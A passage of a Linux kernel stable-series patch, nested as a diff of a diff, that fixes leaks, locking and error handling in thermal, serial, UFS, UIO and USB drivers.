++++ b/drivers/thermal/thermal_of.c
+@@ -604,13 +604,15 @@ struct thermal_zone_device *thermal_of_zone_register(struct device_node *sensor,
+ 	if (IS_ERR(np)) {
+ 		if (PTR_ERR(np) != -ENODEV)
+ 			pr_err("Failed to find thermal zone for %pOFn id=%d\n", sensor, id);
+-		return ERR_CAST(np);
++		ret = PTR_ERR(np);
++		goto out_kfree_of_ops;
+ 	}
+ 
+ 	trips = thermal_of_trips_init(np, &ntrips);
+ 	if (IS_ERR(trips)) {
+ 		pr_err("Failed to find trip points for %pOFn id=%d\n", sensor, id);
+-		return ERR_CAST(trips);
++		ret = PTR_ERR(trips);
++		goto out_kfree_of_ops;
+ 	}
+ 
+ 	ret = thermal_of_monitor_init(np, &delay, &pdelay);
+@@ -659,6 +661,8 @@ out_kfree_tzp:
+ 	kfree(tzp);
+ out_kfree_trips:
+ 	kfree(trips);
++out_kfree_of_ops:
++	kfree(of_ops);
+ 
+ 	return ERR_PTR(ret);
+ }
+diff --git a/drivers/tty/serial/8250/8250_bcm7271.c b/drivers/tty/serial/8250/8250_bcm7271.c
+index fa8ccf204d860..89bfcefbea848 100644
+--- a/drivers/tty/serial/8250/8250_bcm7271.c
++++ b/drivers/tty/serial/8250/8250_bcm7271.c
+@@ -1212,9 +1212,17 @@ static struct platform_driver brcmuart_platform_driver = {
+ 
+ static int __init brcmuart_init(void)
+ {
++	int ret;
++
+ 	brcmuart_debugfs_root = debugfs_create_dir(
+ 		brcmuart_platform_driver.driver.name, NULL);
+-	return platform_driver_register(&brcmuart_platform_driver);
++	ret = platform_driver_register(&brcmuart_platform_driver);
++	if (ret) {
++		debugfs_remove_recursive(brcmuart_debugfs_root);
++		return ret;
++	}
++
++	return 0;
+ }
+ module_init(brcmuart_init);
+ 
+diff --git a/drivers/tty/serial/altera_uart.c b/drivers/tty/serial/altera_uart.c
+index 82f2790de28d1..1203d1e08cd6c 100644
+--- a/drivers/tty/serial/altera_uart.c
++++ b/drivers/tty/serial/altera_uart.c
+@@ -278,16 +278,17 @@ static irqreturn_t altera_uart_interrupt(int irq, void *data)
+ {
+ 	struct uart_port *port = data;
+ 	struct altera_uart *pp = container_of(port, struct altera_uart, port);
++	unsigned long flags;
+ 	unsigned int isr;
+ 
+ 	isr = altera_uart_readl(port, ALTERA_UART_STATUS_REG) & pp->imr;
+ 
+-	spin_lock(&port->lock);
++	spin_lock_irqsave(&port->lock, flags);
+ 	if (isr & ALTERA_UART_STATUS_RRDY_MSK)
+ 		altera_uart_rx_chars(port);
+ 	if (isr & ALTERA_UART_STATUS_TRDY_MSK)
+ 		altera_uart_tx_chars(port);
+-	spin_unlock(&port->lock);
++	spin_unlock_irqrestore(&port->lock, flags);
+ 
+ 	return IRQ_RETVAL(isr);
+ }
+diff --git a/drivers/tty/serial/amba-pl011.c b/drivers/tty/serial/amba-pl011.c
+index 5cdced39eafdb..aa0bbb7abeacf 100644
+--- a/drivers/tty/serial/amba-pl011.c
++++ b/drivers/tty/serial/amba-pl011.c
+@@ -1045,6 +1045,9 @@ static void pl011_dma_rx_callback(void *data)
+  */
+ static inline void pl011_dma_rx_stop(struct uart_amba_port *uap)
+ {
++	if (!uap->using_rx_dma)
++		return;
++
+ 	/* FIXME.  Just disable the DMA enable */
+ 	uap->dmacr &= ~UART011_RXDMAE;
+ 	pl011_write(uap->dmacr, uap, REG_DMACR);
+@@ -1828,8 +1831,17 @@ static void pl011_enable_interrupts(struct uart_amba_port *uap)
+ static void pl011_unthrottle_rx(struct uart_port *port)
+ {
+ 	struct uart_amba_port *uap = container_of(port, struct uart_amba_port, port);
++	unsigned long flags;
+ 
+-	pl011_enable_interrupts(uap);
++	spin_lock_irqsave(&uap->port.lock, flags);
++
++	uap->im = UART011_RTIM;
++	if (!pl011_dma_rx_running(uap))
++		uap->im |= UART011_RXIM;
++
++	pl011_write(uap->im, uap, REG_IMSC);
++
++	spin_unlock_irqrestore(&uap->port.lock, flags);
+ }
+ 
+ static int pl011_startup(struct uart_port *port)
+diff --git a/drivers/tty/serial/pch_uart.c b/drivers/tty/serial/pch_uart.c
+index c59ce78865799..b17788cf309b1 100644
+--- a/drivers/tty/serial/pch_uart.c
++++ b/drivers/tty/serial/pch_uart.c
+@@ -694,6 +694,7 @@ static void pch_request_dma(struct uart_port *port)
+ 	if (!chan) {
+ 		dev_err(priv->port.dev, "%s:dma_request_channel FAILS(Tx)\n",
+ 			__func__);
++		pci_dev_put(dma_dev);
+ 		return;
+ 	}
+ 	priv->chan_tx = chan;
+@@ -710,6 +711,7 @@ static void pch_request_dma(struct uart_port *port)
+ 			__func__);
+ 		dma_release_channel(priv->chan_tx);
+ 		priv->chan_tx = NULL;
++		pci_dev_put(dma_dev);
+ 		return;
+ 	}
+ 
+@@ -717,6 +719,8 @@ static void pch_request_dma(struct uart_port *port)
+ 	priv->rx_buf_virt = dma_alloc_coherent(port->dev, port->fifosize,
+ 				    &priv->rx_buf_dma, GFP_KERNEL);
+ 	priv->chan_rx = chan;
++
++	pci_dev_put(dma_dev);
+ }
+ 
+ static void pch_dma_rx_complete(void *arg)
+diff --git a/drivers/tty/serial/serial-tegra.c b/drivers/tty/serial/serial-tegra.c
+index b7170cb9a544f..cda9cd4fa92c8 100644
+--- a/drivers/tty/serial/serial-tegra.c
++++ b/drivers/tty/serial/serial-tegra.c
+@@ -619,8 +619,9 @@ static void tegra_uart_stop_tx(struct uart_port *u)
+ 	if (tup->tx_in_progress != TEGRA_UART_TX_DMA)
+ 		return;
+ 
+-	dmaengine_terminate_all(tup->tx_dma_chan);
++	dmaengine_pause(tup->tx_dma_chan);
+ 	dmaengine_tx_status(tup->tx_dma_chan, tup->tx_cookie, &state);
++	dmaengine_terminate_all(tup->tx_dma_chan);
+ 	count = tup->tx_bytes_requested - state.residue;
+ 	async_tx_ack(tup->tx_dma_desc);
+ 	uart_xmit_advance(&tup->uport, count);
+@@ -763,8 +764,9 @@ static void tegra_uart_terminate_rx_dma(struct tegra_uart_port *tup)
+ 		return;
+ 	}
+ 
+-	dmaengine_terminate_all(tup->rx_dma_chan);
++	dmaengine_pause(tup->rx_dma_chan);
+ 	dmaengine_tx_status(tup->rx_dma_chan, tup->rx_cookie, &state);
++	dmaengine_terminate_all(tup->rx_dma_chan);
+ 
+ 	tegra_uart_rx_buffer_push(tup, state.residue);
+ 	tup->rx_dma_active = false;
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index dfdbcf092facc..b8aed28b8f17b 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -1681,22 +1681,10 @@ static int stm32_usart_serial_probe(struct platform_device *pdev)
+ 	if (!stm32port->info)
+ 		return -EINVAL;
+ 
+-	ret = stm32_usart_init_port(stm32port, pdev);
+-	if (ret)
+-		return ret;
+-
+-	if (stm32port->wakeup_src) {
+-		device_set_wakeup_capable(&pdev->dev, true);
+-		ret = dev_pm_set_wake_irq(&pdev->dev, stm32port->port.irq);
+-		if (ret)
+-			goto err_deinit_port;
+-	}
+-
+ 	stm32port->rx_ch = dma_request_chan(&pdev->dev, "rx");
+-	if (PTR_ERR(stm32port->rx_ch) == -EPROBE_DEFER) {
+-		ret = -EPROBE_DEFER;
+-		goto err_wakeirq;
+-	}
++	if (PTR_ERR(stm32port->rx_ch) == -EPROBE_DEFER)
++		return -EPROBE_DEFER;
++
+ 	/* Fall back in interrupt mode for any non-deferral error */
+ 	if (IS_ERR(stm32port->rx_ch))
+ 		stm32port->rx_ch = NULL;
+@@ -1710,6 +1698,17 @@ static int stm32_usart_serial_probe(struct platform_device *pdev)
+ 	if (IS_ERR(stm32port->tx_ch))
+ 		stm32port->tx_ch = NULL;
+ 
++	ret = stm32_usart_init_port(stm32port, pdev);
++	if (ret)
++		goto err_dma_tx;
++
++	if (stm32port->wakeup_src) {
++		device_set_wakeup_capable(&pdev->dev, true);
++		ret = dev_pm_set_wake_irq(&pdev->dev, stm32port->port.irq);
++		if (ret)
++			goto err_deinit_port;
++	}
++
+ 	if (stm32port->rx_ch && stm32_usart_of_dma_rx_probe(stm32port, pdev)) {
+ 		/* Fall back in interrupt mode */
+ 		dma_release_channel(stm32port->rx_ch);
+@@ -1746,19 +1745,11 @@ err_port:
+ 	pm_runtime_set_suspended(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 
+-	if (stm32port->tx_ch) {
++	if (stm32port->tx_ch)
+ 		stm32_usart_of_dma_tx_remove(stm32port, pdev);
+-		dma_release_channel(stm32port->tx_ch);
+-	}
+-
+ 	if (stm32port->rx_ch)
+ 		stm32_usart_of_dma_rx_remove(stm32port, pdev);
+ 
+-err_dma_rx:
+-	if (stm32port->rx_ch)
+-		dma_release_channel(stm32port->rx_ch);
+-
+-err_wakeirq:
+ 	if (stm32port->wakeup_src)
+ 		dev_pm_clear_wake_irq(&pdev->dev);
+ 
+@@ -1768,6 +1759,14 @@ err_deinit_port:
+ 
+ 	stm32_usart_deinit_port(stm32port);
+ 
++err_dma_tx:
++	if (stm32port->tx_ch)
++		dma_release_channel(stm32port->tx_ch);
++
++err_dma_rx:
++	if (stm32port->rx_ch)
++		dma_release_channel(stm32port->rx_ch);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/tty/serial/sunsab.c b/drivers/tty/serial/sunsab.c
+index 99608b2a2b74f..7ace3aa498402 100644
+--- a/drivers/tty/serial/sunsab.c
++++ b/drivers/tty/serial/sunsab.c
+@@ -1133,7 +1133,13 @@ static int __init sunsab_init(void)
+ 		}
+ 	}
+ 
+-	return platform_driver_register(&sab_driver);
++	err = platform_driver_register(&sab_driver);
++	if (err) {
++		kfree(sunsab_ports);
++		sunsab_ports = NULL;
++	}
++
++	return err;
+ }
+ 
+ static void __exit sunsab_exit(void)
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index b1f59a5fe6327..d1db6be801560 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -5382,6 +5382,26 @@ static void __ufshcd_transfer_req_compl(struct ufs_hba *hba,
+ 	}
+ }
+ 
++/* Any value that is not an existing queue number is fine for this constant. */
++enum {
++	UFSHCD_POLL_FROM_INTERRUPT_CONTEXT = -1
++};
++
++static void ufshcd_clear_polled(struct ufs_hba *hba,
++				unsigned long *completed_reqs)
++{
++	int tag;
++
++	for_each_set_bit(tag, completed_reqs, hba->nutrs) {
++		struct scsi_cmnd *cmd = hba->lrb[tag].cmd;
++
++		if (!cmd)
++			continue;
++		if (scsi_cmd_to_rq(cmd)->cmd_flags & REQ_POLLED)
++			__clear_bit(tag, completed_reqs);
++	}
++}
++
+ /*
+  * Returns > 0 if one or more commands have been completed or 0 if no
+  * requests have been completed.
+@@ -5398,13 +5418,17 @@ static int ufshcd_poll(struct Scsi_Host *shost, unsigned int queue_num)
+ 	WARN_ONCE(completed_reqs & ~hba->outstanding_reqs,
+ 		  "completed: %#lx; outstanding: %#lx\n", completed_reqs,
+ 		  hba->outstanding_reqs);
++	if (queue_num == UFSHCD_POLL_FROM_INTERRUPT_CONTEXT) {
++		/* Do not complete polled requests from interrupt context. */
++		ufshcd_clear_polled(hba, &completed_reqs);
++	}
+ 	hba->outstanding_reqs &= ~completed_reqs;
+ 	spin_unlock_irqrestore(&hba->outstanding_lock, flags);
+ 
+ 	if (completed_reqs)
+ 		__ufshcd_transfer_req_compl(hba, completed_reqs);
+ 
+-	return completed_reqs;
++	return completed_reqs != 0;
+ }
+ 
+ /**
+@@ -5435,7 +5459,7 @@ static irqreturn_t ufshcd_transfer_req_compl(struct ufs_hba *hba)
+ 	 * Ignore the ufshcd_poll() return value and return IRQ_HANDLED since we
+ 	 * do not want polling to trigger spurious interrupt complaints.
+ 	 */
+-	ufshcd_poll(hba->host, 0);
++	ufshcd_poll(hba->host, UFSHCD_POLL_FROM_INTERRUPT_CONTEXT);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -8747,8 +8771,6 @@ static int ufshcd_set_dev_pwr_mode(struct ufs_hba *hba,
+ 	struct scsi_device *sdp;
+ 	unsigned long flags;
+ 	int ret, retries;
+-	unsigned long deadline;
+-	int32_t remaining;
+ 
+ 	spin_lock_irqsave(hba->host->host_lock, flags);
+ 	sdp = hba->ufs_device_wlun;
+@@ -8781,14 +8803,9 @@ static int ufshcd_set_dev_pwr_mode(struct ufs_hba *hba,
+ 	 * callbacks hence set the RQF_PM flag so that it doesn't resume the
+ 	 * already suspended childs.
+ 	 */
+-	deadline = jiffies + 10 * HZ;
+ 	for (retries = 3; retries > 0; --retries) {
+-		ret = -ETIMEDOUT;
+-		remaining = deadline - jiffies;
+-		if (remaining <= 0)
+-			break;
+ 		ret = scsi_execute(sdp, cmd, DMA_NONE, NULL, 0, NULL, &sshdr,
+-				   remaining / HZ, 0, 0, RQF_PM, NULL);
++				   HZ, 0, 0, RQF_PM, NULL);
+ 		if (!scsi_status_is_check_condition(ret) ||
+ 				!scsi_sense_valid(&sshdr) ||
+ 				sshdr.sense_key != UNIT_ATTENTION)
+diff --git a/drivers/uio/uio_dmem_genirq.c b/drivers/uio/uio_dmem_genirq.c
+index 1106f33764047..792c3e9c9ce53 100644
+--- a/drivers/uio/uio_dmem_genirq.c
++++ b/drivers/uio/uio_dmem_genirq.c
+@@ -110,8 +110,10 @@ static irqreturn_t uio_dmem_genirq_handler(int irq, struct uio_info *dev_info)
+ 	 * remember the state so we can allow user space to enable it later.
+ 	 */
+ 
++	spin_lock(&priv->lock);
+ 	if (!test_and_set_bit(0, &priv->flags))
+ 		disable_irq_nosync(irq);
++	spin_unlock(&priv->lock);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -125,20 +127,19 @@ static int uio_dmem_genirq_irqcontrol(struct uio_info *dev_info, s32 irq_on)
+ 	 * in the interrupt controller, but keep track of the
+ 	 * state to prevent per-irq depth damage.
+ 	 *
+-	 * Serialize this operation to support multiple tasks.
++	 * Serialize this operation to support multiple tasks and concurrency
++	 * with irq handler on SMP systems.
+ 	 */
+ 
+ 	spin_lock_irqsave(&priv->lock, flags);
+ 	if (irq_on) {
+ 		if (test_and_clear_bit(0, &priv->flags))
+ 			enable_irq(dev_info->irq);
+-		spin_unlock_irqrestore(&priv->lock, flags);
+ 	} else {
+-		if (!test_and_set_bit(0, &priv->flags)) {
+-			spin_unlock_irqrestore(&priv->lock, flags);
+-			disable_irq(dev_info->irq);
+-		}
++		if (!test_and_set_bit(0, &priv->flags))
++			disable_irq_nosync(dev_info->irq);
+ 	}
++	spin_unlock_irqrestore(&priv->lock, flags);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/usb/cdns3/cdnsp-ring.c b/drivers/usb/cdns3/cdnsp-ring.c
+index 2f29431f612e0..b23e543b3a3d5 100644
+--- a/drivers/usb/cdns3/cdnsp-ring.c
++++ b/drivers/usb/cdns3/cdnsp-ring.c
+@@ -2006,10 +2006,11 @@ int cdnsp_queue_bulk_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ 
+ int cdnsp_queue_ctrl_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ {
+-	u32 field, length_field, remainder;
++	u32 field, length_field, zlp = 0;
+ 	struct cdnsp_ep *pep = preq->pep;
+ 	struct cdnsp_ring *ep_ring;
+ 	int num_trbs;
++	u32 maxp;
+ 	int ret;
+ 
+ 	ep_ring = cdnsp_request_to_transfer_ring(pdev, preq);
+@@ -2019,26 +2020,33 @@ int cdnsp_queue_ctrl_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ 	/* 1 TRB for data, 1 for status */
+ 	num_trbs = (pdev->three_stage_setup) ? 2 : 1;
+ 
++	maxp = usb_endpoint_maxp(pep->endpoint.desc);
++
++	if (preq->request.zero && preq->request.length &&
++	    (preq->request.length % maxp == 0)) {
++		num_trbs++;
++		zlp = 1;
++	}
++
+ 	ret = cdnsp_prepare_transfer(pdev, preq, num_trbs);
+ 	if (ret)
+ 		return ret;
+ 
+ 	/* If there's data, queue data TRBs */
+-	if (pdev->ep0_expect_in)
+-		field = TRB_TYPE(TRB_DATA) | TRB_IOC;
+-	else
+-		field = TRB_ISP | TRB_TYPE(TRB_DATA) | TRB_IOC;
+-
+ 	if (preq->request.length > 0) {
+-		remainder = cdnsp_td_remainder(pdev, 0, preq->request.length,
+-					       preq->request.length, preq, 1, 0);
++		field = TRB_TYPE(TRB_DATA);
+ 
+-		length_field = TRB_LEN(preq->request.length) |
+-				TRB_TD_SIZE(remainder) | TRB_INTR_TARGET(0);
++		if (zlp)
++			field |= TRB_CHAIN;
++		else
++			field |= TRB_IOC | (pdev->ep0_expect_in ? 0 : TRB_ISP);
+ 
+ 		if (pdev->ep0_expect_in)
+ 			field |= TRB_DIR_IN;
+ 
++		length_field = TRB_LEN(preq->request.length) |
++			       TRB_TD_SIZE(zlp) | TRB_INTR_TARGET(0);
++
+ 		cdnsp_queue_trb(pdev, ep_ring, true,
+ 				lower_32_bits(preq->request.dma),
+ 				upper_32_bits(preq->request.dma), length_field,
+@@ -2046,6 +2054,20 @@ int cdnsp_queue_ctrl_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ 				TRB_SETUPID(pdev->setup_id) |
+ 				pdev->setup_speed);
+ 
++		if (zlp) {
++			field = TRB_TYPE(TRB_NORMAL) | TRB_IOC;
++
++			if (!pdev->ep0_expect_in)
++				field = TRB_ISP;
++
++			cdnsp_queue_trb(pdev, ep_ring, true,
++					lower_32_bits(preq->request.dma),
++					upper_32_bits(preq->request.dma), 0,
++					field | ep_ring->cycle_state |
++					TRB_SETUPID(pdev->setup_id) |
++					pdev->setup_speed);
++		}
++
+ 		pdev->ep0_stage = CDNSP_DATA_STAGE;
+ 	}
+ 
+diff --git a/drivers/usb/core/hcd.c b/drivers/usb/core/hcd.c
+index faeaace0d197d..8300baedafd20 100644
+--- a/drivers/usb/core/hcd.c
++++ b/drivers/usb/core/hcd.c
+@@ -3133,8 +3133,12 @@ int usb_hcd_setup_local_mem(struct usb_hcd *hcd, phys_addr_t phys_addr,
+ 					     GFP_KERNEL,
+ 					     DMA_ATTR_WRITE_COMBINE);
+ 
+-	if (IS_ERR(local_mem))
++	if (IS_ERR_OR_NULL(local_mem)) {
++		if (!local_mem)
++			return -ENOMEM;
++
+ 		return PTR_ERR(local_mem);
++	}
+ 
+ 	/*
+ 	 * Here we pass a dma_addr_t but the arg type is a phys_addr_t.
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 1f348bc867c22..476b636185116 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -122,21 +122,25 @@ static void __dwc3_set_mode(struct work_struct *work)
+ 	unsigned long flags;
+ 	int ret;
+ 	u32 reg;
++	u32 desired_dr_role;
+ 
+ 	mutex_lock(&dwc->mutex);
++	spin_lock_irqsave(&dwc->lock, flags);
++	desired_dr_role = dwc->desired_dr_role;
++	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+ 	pm_runtime_get_sync(dwc->dev);
+ 
+ 	if (dwc->current_dr_role == DWC3_GCTL_PRTCAP_OTG)
+ 		dwc3_otg_update(dwc, 0);
+ 
+-	if (!dwc->desired_dr_role)
++	if (!desired_dr_role)
+ 		goto out;
+ 
+-	if (dwc->desired_dr_role == dwc->current_dr_role)
++	if (desired_dr_role == dwc->current_dr_role)
+ 		goto out;
+ 
+-	if (dwc->desired_dr_role == DWC3_GCTL_PRTCAP_OTG && dwc->edev)
++	if (desired_dr_role == DWC3_GCTL_PRTCAP_OTG && dwc->edev)
+ 		goto out;
+ 
+ 	switch (dwc->current_dr_role) {
+@@ -164,7 +168,7 @@ static void __dwc3_set_mode(struct work_struct *work)
+ 	 */
+ 	if (dwc->current_dr_role && ((DWC3_IP_IS(DWC3) ||
+ 			DWC3_VER_IS_PRIOR(DWC31, 190A)) &&
+-			dwc->desired_dr_role != DWC3_GCTL_PRTCAP_OTG)) {
++			desired_dr_role != DWC3_GCTL_PRTCAP_OTG)) {
+ 		reg = dwc3_readl(dwc->regs, DWC3_GCTL);
+ 		reg |= DWC3_GCTL_CORESOFTRESET;
+ 		dwc3_writel(dwc->regs, DWC3_GCTL, reg);
+@@ -184,11 +188,11 @@ static void __dwc3_set_mode(struct work_struct *work)
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 
+-	dwc3_set_prtcap(dwc, dwc->desired_dr_role);
++	dwc3_set_prtcap(dwc, desired_dr_role);
+ 
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+-	switch (dwc->desired_dr_role) {
++	switch (desired_dr_role) {
+ 	case DWC3_GCTL_PRTCAP_HOST:
+ 		ret = dwc3_host_init(dwc);
+ 		if (ret) {
+@@ -1096,8 +1100,13 @@ static int dwc3_core_init(struct dwc3 *dwc)
+ 
+ 	if (!dwc->ulpi_ready) {
+ 		ret = dwc3_core_ulpi_init(dwc);
+-		if (ret)
++		if (ret) {
++			if (ret == -ETIMEDOUT) {
++				dwc3_core_soft_reset(dwc);
++				ret = -EPROBE_DEFER;
++			}
+ 			goto err0;
++		}
+ 		dwc->ulpi_ready = true;
+ 	}
+ 
+diff --git a/drivers/usb/dwc3/dwc3-qcom.c b/drivers/usb/dwc3/dwc3-qcom.c
+index 7c40f3ffc0544..b0a0351d2d8b5 100644
+--- a/drivers/usb/dwc3/dwc3-qcom.c
++++ b/drivers/usb/dwc3/dwc3-qcom.c
+@@ -261,7 +261,8 @@ static int dwc3_qcom_interconnect_init(struct dwc3_qcom *qcom)
+ 	if (IS_ERR(qcom->icc_path_apps)) {
+ 		dev_err(dev, "failed to get apps-usb path: %ld\n",
+ 				PTR_ERR(qcom->icc_path_apps));
+-		return PTR_ERR(qcom->icc_path_apps);
++		ret = PTR_ERR(qcom->icc_path_apps);
++		goto put_path_ddr;
+ 	}
+ 
+ 	max_speed = usb_get_maximum_speed(&qcom->dwc3->dev);
+@@ -274,16 +275,22 @@ static int dwc3_qcom_interconnect_init(struct dwc3_qcom *qcom)
+ 	}
+ 	if (ret) {
+ 		dev_err(dev, "failed to set bandwidth for usb-ddr path: %d\n", ret);
+-		return ret;
++		goto put_path_apps;
+ 	}
+ 
+ 	ret = icc_set_bw(qcom->icc_path_apps, APPS_USB_AVG_BW, APPS_USB_PEAK_BW);
+ 	if (ret) {
+ 		dev_err(dev, "failed to set bandwidth for apps-usb path: %d\n", ret);
+-		return ret;
++		goto put_path_apps;
+ 	}
+ 
+ 	return 0;
++
++put_path_apps:
++	icc_put(qcom->icc_path_apps);
++put_path_ddr:
++	icc_put(qcom->icc_path_ddr);
++	return ret;
+ }
+ 
+ /**
+diff --git a/drivers/usb/gadget/function/f_hid.c b/drivers/usb/gadget/function/f_hid.c
+index ca0a7d9eaa34e..6be6009f911e1 100644
+--- a/drivers/usb/gadget/function/f_hid.c
++++ b/drivers/usb/gadget/function/f_hid.c
+@@ -71,7 +71,7 @@ struct f_hidg {
+ 	wait_queue_head_t		write_queue;
+ 	struct usb_request		*req;
+ 
+-	int				minor;
++	struct device			dev;
+ 	struct cdev			cdev;
+ 	struct usb_function		func;
+ 
+@@ -84,6 +84,14 @@ static inline struct f_hidg *func_to_hidg(struct usb_function *f)
+ 	return container_of(f, struct f_hidg, func);
+ }
+ 
++static void hidg_release(struct device *dev)
++{
++	struct f_hidg *hidg = container_of(dev, struct f_hidg, dev);
++
++	kfree(hidg->set_report_buf);
++	kfree(hidg);
++}
++
+ /*-------------------------------------------------------------------------*/
+ /*                           Static descriptors                            */
+ 
+@@ -904,9 +912,7 @@ static int hidg_bind(struct usb_configuration *c, struct usb_function *f)
+ 	struct usb_ep		*ep;
+ 	struct f_hidg		*hidg = func_to_hidg(f);
+ 	struct usb_string	*us;
+-	struct device		*device;
+ 	int			status;
+-	dev_t			dev;
+ 
+ 	/* maybe allocate device-global string IDs, and patch descriptors */
+ 	us = usb_gstrings_attach(c->cdev, ct_func_strings,
+@@ -999,21 +1005,11 @@ static int hidg_bind(struct usb_configuration *c, struct usb_function *f)
+ 
+ 	/* create char device */
+ 	cdev_init(&hidg->cdev, &f_hidg_fops);
+-	dev = MKDEV(major, hidg->minor);
+-	status = cdev_add(&hidg->cdev, dev, 1);
++	status = cdev_device_add(&hidg->cdev, &hidg->dev);
+ 	if (status)
+ 		goto fail_free_descs;
+ 
+-	device = device_create(hidg_class, NULL, dev, NULL,
+-			       "%s%d", "hidg", hidg->minor);
+-	if (IS_ERR(device)) {
+-		status = PTR_ERR(device);
+-		goto del;
+-	}
+-
+ 	return 0;
+-del:
+-	cdev_del(&hidg->cdev);
+ fail_free_descs:
+ 	usb_free_all_descriptors(f);
+ fail:
+@@ -1244,9 +1240,7 @@ static void hidg_free(struct usb_function *f)
+ 
+ 	hidg = func_to_hidg(f);
+ 	opts = container_of(f->fi, struct f_hid_opts, func_inst);
+-	kfree(hidg->report_desc);
+-	kfree(hidg->set_report_buf);
+-	kfree(hidg);
++	put_device(&hidg->dev);
+ 	mutex_lock(&opts->lock);
+ 	--opts->refcnt;
+ 	mutex_unlock(&opts->lock);
+@@ -1256,8 +1250,7 @@ static void hidg_unbind(struct usb_configuration *c, struct usb_function *f)
+ {
+ 	struct f_hidg *hidg = func_to_hidg(f);
+ 
+-	device_destroy(hidg_class, MKDEV(major, hidg->minor));
+-	cdev_del(&hidg->cdev);
++	cdev_device_del(&hidg->cdev, &hidg->dev);
+ 
+ 	usb_free_all_descriptors(f);
+ }
+@@ -1266,6 +1259,7 @@ static struct usb_function *hidg_alloc(struct usb_function_instance *fi)
+ {
+ 	struct f_hidg *hidg;
+ 	struct f_hid_opts *opts;
++	int ret;
+ 
+ 	/* allocate and initialize one new instance */
+ 	hidg = kzalloc(sizeof(*hidg), GFP_KERNEL);
+@@ -1277,17 +1271,28 @@ static struct usb_function *hidg_alloc(struct usb_function_instance *fi)
+ 	mutex_lock(&opts->lock);
+ 	++opts->refcnt;
+ 
+-	hidg->minor = opts->minor;
++	device_initialize(&hidg->dev);
++	hidg->dev.release = hidg_release;
++	hidg->dev.class = hidg_class;
++	hidg->dev.devt = MKDEV(major, opts->minor);
++	ret = dev_set_name(&hidg->dev, "hidg%d", opts->minor);
++	if (ret) {
++		--opts->refcnt;
++		mutex_unlock(&opts->lock);
++		return ERR_PTR(ret);
++	}
++
+ 	hidg->bInterfaceSubClass = opts->subclass;
+ 	hidg->bInterfaceProtocol = opts->protocol;
+ 	hidg->report_length = opts->report_length;
+ 	hidg->report_desc_length = opts->report_desc_length;
+ 	if (opts->report_desc) {
+-		hidg->report_desc = kmemdup(opts->report_desc,
+-					    opts->report_desc_length,
+-					    GFP_KERNEL);
++		hidg->report_desc = devm_kmemdup(&hidg->dev, opts->report_desc,
++						 opts->report_desc_length,
++						 GFP_KERNEL);
+ 		if (!hidg->report_desc) {
+-			kfree(hidg);
++			put_device(&hidg->dev);
++			--opts->refcnt;
+ 			mutex_unlock(&opts->lock);
+ 			return ERR_PTR(-ENOMEM);
+ 		}
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index c63c0c2cf649d..bf9878e1a72a8 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -734,13 +734,13 @@ int usb_gadget_disconnect(struct usb_gadget *gadget)
+ 	}
+ 
+ 	ret = gadget->ops->pullup(gadget, 0);
+-	if (!ret) {
++	if (!ret)
+ 		gadget->connected = 0;
+-		mutex_lock(&udc_lock);
+-		if (gadget->udc->driver)
+-			gadget->udc->driver->disconnect(gadget);
+-		mutex_unlock(&udc_lock);
+-	}
++
++	mutex_lock(&udc_lock);
++	if (gadget->udc->driver)
++		gadget->udc->driver->disconnect(gadget);
++	mutex_unlock(&udc_lock);
+ 
+ out:
+ 	trace_usb_gadget_disconnect(gadget, ret);
+diff --git a/drivers/usb/gadget/udc/fotg210-udc.c b/drivers/usb/gadget/udc/fotg210-udc.c
+index fdca28e72a3b4..d0e051beb3af9 100644
+--- a/drivers/usb/gadget/udc/fotg210-udc.c
++++ b/drivers/usb/gadget/udc/fotg210-udc.c
+@@ -629,10 +629,10 @@ static void fotg210_request_error(struct fotg210_udc *fotg210)
+ static void fotg210_set_address(struct fotg210_udc *fotg210,
+ 				struct usb_ctrlrequest *ctrl)
+ {
+-	if (ctrl->wValue >= 0x0100) {
++	if (le16_to_cpu(ctrl->wValue) >= 0x0100) {
+ 		fotg210_request_error(fotg210);
+ 	} else {
+-		fotg210_set_dev_addr(fotg210, ctrl->wValue);
++		fotg210_set_dev_addr(fotg210, le16_to_cpu(ctrl->wValue));
+ 		fotg210_set_cxdone(fotg210);
+ 	}
+ }
+@@ -713,17 +713,17 @@ static void fotg210_get_status(struct fotg210_udc *fotg210,
+ 
+ 	switch (ctrl->bRequestType & USB_RECIP_MASK) {
+ 	case USB_RECIP_DEVICE:
+-		fotg210->ep0_data = 1 << USB_DEVICE_SELF_POWERED;
++		fotg210->ep0_data = cpu_to_le16(1 << USB_DEVICE_SELF_POWERED);
+ 		break;
+ 	case USB_RECIP_INTERFACE:
+-		fotg210->ep0_data = 0;
++		fotg210->ep0_data = cpu_to_le16(0);
+ 		break;
+ 	case USB_RECIP_ENDPOINT:
+ 		epnum = ctrl->wIndex & USB_ENDPOINT_NUMBER_MASK;
+ 		if (epnum)
+ 			fotg210->ep0_data =
+-				fotg210_is_epnstall(fotg210->ep[epnum])
+-				<< USB_ENDPOINT_HALT;
++				cpu_to_le16(fotg210_is_epnstall(fotg210->ep[epnum])
++					    << USB_ENDPOINT_HALT);
+ 		else
+ 			fotg210_request_error(fotg210);
+ 		break;
